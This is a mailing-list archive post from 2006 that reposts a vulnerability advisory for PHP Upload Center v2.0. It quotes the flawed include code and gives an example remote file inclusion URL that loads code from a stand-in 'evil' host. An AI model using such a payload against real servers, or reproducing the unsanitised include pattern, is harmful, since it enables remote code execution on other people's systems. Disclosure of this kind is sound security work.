Security Incidents mailing list archives
Re: http://thebesthack.altervista.org/input.txt
From: santa () northpole com
Date: 14 Dec 2006 00:45:58 -0000
************************************************************************************************************************* * Name = PHP Upload Center v2.0 ; * Class = Remote/Local File Inclusion ; * Download = http://skrypty.webpc.pl/pobierz.php?id=58 ; * Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ; ------------------------------------------------------------------------------------------------------------------------- Vulnerable Code in activate.php line 66-70 ... if (!isset($language)) $language=$dft_language; if ($language=="") $language=$dft_language; require("include/${language}.php"); <== Local incl. ... line 164 ... include($footerpage); <== Remote incl. ... Code in include/en.php (and other language files) line 5-7 ... $headerpage="include/header.htm"; $footerpage="include/footer.htm"; <== $infopage="include/info.htm"; ... - Ex. : http://[target]/[path]/activate.php?language=conf&footerpage=http://evil? ************************************************************************************************************************* Gr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch. ************************************************************************************************************************* ------------------------------------------------------------------------------ This List Sponsored by: Black Hat Attend the Black Hat Briefings & Training USA, July 29-August 3 in Las Vegas. World renowned security experts reveal tomorrow's threats today. Free of vendor pitches, the Briefings are designed to be pragmatic regardless of your security environment. Featuring 36 hands-on training courses and 10 conference tracks, networking opportunities with over 2,500 delegates from 40+ nations. http://www.blackhat.com ------------------------------------------------------------------------------
Current thread:
- http://thebesthack.altervista.org/input.txt modincidents (Dec 13)
- Re: http://thebesthack.altervista.org/input.txt Bojan Zdrnja (Dec 13)
- Re: http://thebesthack.altervista.org/input.txt ascii (Dec 14)
- Re: http://thebesthack.altervista.org/input.txt Adriano Carvalho (Dec 14)
- <Possible follow-ups>
- Re: http://thebesthack.altervista.org/input.txt santa (Dec 13)